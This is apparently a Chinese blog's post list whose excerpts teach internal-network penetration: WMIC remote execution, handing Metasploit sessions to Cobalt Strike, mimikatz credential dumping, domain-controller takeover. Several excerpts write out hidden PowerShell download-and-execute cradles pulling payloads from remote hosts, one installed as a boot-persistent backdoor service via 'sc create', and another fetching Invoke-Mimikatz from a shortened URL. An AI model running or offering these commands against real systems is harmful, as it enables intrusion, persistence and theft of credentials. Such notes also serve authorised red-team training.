自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 收藏
  • 关注

原创 远程连接windows

3389在windows-运行,输入mstsc,回车即可 需要对方开启3389端口,并且你有对方机器的用户名和密码wmic远程连接wmic /node:"192.168.2.23" /password:"abc123" /user:"administrator"如果能够远程连接成功,就可以执行一些wmic命令wmic /node:"192.168.2.23" /p...

2018-04-17 14:05:22 1942

原创 msf传递shell给cobalt strike

前提:拿到msf的session会话 方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.20:80/a'))"方法2:通过msf的expl...

2018-04-11 17:02:10 2268 1

原创 mimikatz使用

mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权privilege::debug //提升权限(从administrator提升到system)抓取hashsekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行)lsadump::lsa ...

2018-04-11 16:46:48 6932

原创 端口转发与端口映射

端口映射端口映射是NAT的一种,功能是把在公网的地址转翻译成私有地址, 采用路由方式的ADSL宽带路由器拥有一个动态或固定的公网IP,ADSL直接接在HUB或交换机上,所有的电脑共享上网。端口映射就是将外网主机的IP地址的一个端口映射到内网中一台机器,提供相应的服务。当用户访问该IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。端口映射有动态和静态之分。通俗来讲,端口映射...

2018-04-09 21:45:25 11106

原创 cobalt strike开机自启动后门

前提:拿到cobalt strike的session设置开机自启动服务使用sc命令创建服务sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.1...

2018-04-09 10:54:52 5088 2

原创 内网渗透之收集信息

收集本机ip信息ipconfig /all查看进程,注意杀软tasklist /v查看安装软件的版本(两种方式)wmic product > version.txt利用wmic命令,可以将结果输出到文本中powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,...

2018-04-08 23:08:56 1737

原创 内网渗透技巧

通过powershell 运行mimikatzpowershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 获取hash之后,解出明文密码 将目标机器共享盘映射到本地的h盘net use h: \\ip\c$ "密码"...

2018-04-04 15:53:19 537

原创 windows命令行下载文件

vbs下载通过写一个vbs脚本来下载文件 在windows机器中,命令行执行以下各条命令echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbsecho Set Shell = CreateObject("Wscript.Shell") >>zl.vbsecho Post.Open "GET","htt...

2018-04-03 14:29:48 3516

原创 利用cobalt strike获取域控权限

cobalt strikecobalt strike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。前期准备获取一个cobalt strike的会话。可以利用cs本身的payload,或者是通过别的shell反弹到cs。域内收集信息通过一些cmd命令,可以收集到域内的信息 在cs的会话中,执行命令 查看有多少域和工作组shell net...

2018-04-02 22:20:48 2366

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除